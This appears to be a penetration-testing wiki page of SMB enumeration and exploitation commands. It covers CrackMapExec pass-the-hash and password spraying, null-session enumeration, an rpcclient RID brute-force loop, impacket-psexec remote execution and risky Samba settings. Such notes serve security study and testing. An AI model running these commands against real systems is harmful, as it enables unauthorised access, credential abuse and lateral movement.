SMB

SMB Security & Exploitation Guide

1. About SMB

Server Message Block (SMB) is a client server protocol that provides shared access to:

Files and directories
Printers
Routers and interfaces

It enables communication between nodes in the same network, granting access to resources based on authentication and permissions.

Default Ports:

NetBIOS over TCP: 137, 138, 139
Direct SMB (CIFS): 445

2. Tools for SMB Interaction

CrackMapExec (CME)

A powerful tool for SMB enumeration and exploitation.

Pass-the-Hash or Command Execution:

crackmapexec smb 192.0.2.10 -u Administrator -d . -H <NTLM_HASH> -x whoami

Null-session login and share enumeration:

crackmapexec smb 203.0.113.5 -u '' -p '' --shares

Userlist checking:

crackmapexec smb 198.51.100.20 -u users.txt -p '' -d . --continue-on-success

User=Password spray attack:

crackmapexec smb 198.51.100.20 -u users.txt -d . --no-bruteforce --continue-on-success

Samba

An open-source implementation of SMB/CIFS on Unix-based systems.

Configuration file: /etc/samba/smb.conf
Check active connections:
```
smbstatus
```

Inspect config (excluding comments):

cat /etc/samba/smb.conf | grep -v "#\|\;"

smbclient

A command-line tool to interact with SMB shares.

List available shares (null session):
```
smbclient -N -L //192.0.2.10
```

Connect to a share:

smbclient -U username \\\\192.0.2.10\\share

Useful commands:
- help → show available commands
- ls → list files
- get <file> → download a file
- !<cmd> → run local system command

SMBMap

Automation tool for SMB enumeration and file operations.

Basic enum:
```
smbmap -H 192.0.2.10
```
Recursive enum:
```
smbmap -H 192.0.2.10 -r share
```

Download a file:

smbmap -H 192.0.2.10 --download "share/example.txt"

Upload a file:

smbmap -H 192.0.2.10 --upload example.txt "share/example.txt"

Impacket Tools

Impacket provides Python scripts for SMB interaction and exploitation.

SMB client:

impacket-smbclient 'rio@corp.local' -no-pass

Run SMB server:

sudo impacket-smbserver share ./ -smb2support

Remote code execution:
```
impacket-psexec administrator:'mypass@123'@192.0.2.10
```
(Same applies for smbexec and atexec.)

RPCclient

RPC (Remote Procedure Call) allows process-to-process communication across systems.

Connect (null session):
```
rpcclient -U "" 192.0.2.10
```

Invoke commands:

rpcclient $> enumdomusers
rpcclient $> queryuser <RID>

RID Brute Force (users/groups enumeration):

for i in $(seq 500 1100); do \
rpcclient -N -U "" 192.0.2.10 -c "queryuser 0x$(printf '%x\n' $i)" \
| grep "User Name\|user_rid\|group_rid" && echo ""; done

Alternative: use samrdump.py, enum4linux, or enum4linux-ng:

./enum4linux-ng.py 192.0.2.10 -A

Windows Net Command

net use \\DC01\ipc$ "" /u:""

3. Dangerous SMB Configuration Settings

browseable = yes → Shares are visible in network browsing.
read only = no → Users can create and modify files.
writable = yes → Full write permissions allowed.
guest ok = yes → Anonymous logins permitted.
enable privileges = yes → Honors user privileges (may be abused).
create mask = 0777 → New files created with world read/write permissions.
directory mask = 0777 → New directories created with world read/write permissions.
logon script = script.sh → Executes script at user login.
magic script = script.sh / magic output = script.out → Dangerous auto-execution functionality.

Create a folder.
Use Advanced Sharing to share the folder.
Configure both SMB share permissions and NTFS permissions.
- SMB permissions control network access.
- NTFS permissions control file system access.
Inherited permissions are marked grey (from parent directory).

5. Mounting SMB Shares (Linux)

sudo mount -t cifs -o username=rio,password=rio@123 //192.0.2.10/Sharename /home/user/Desktop/

PreviousFTP NextNFS

Last updated 3 months ago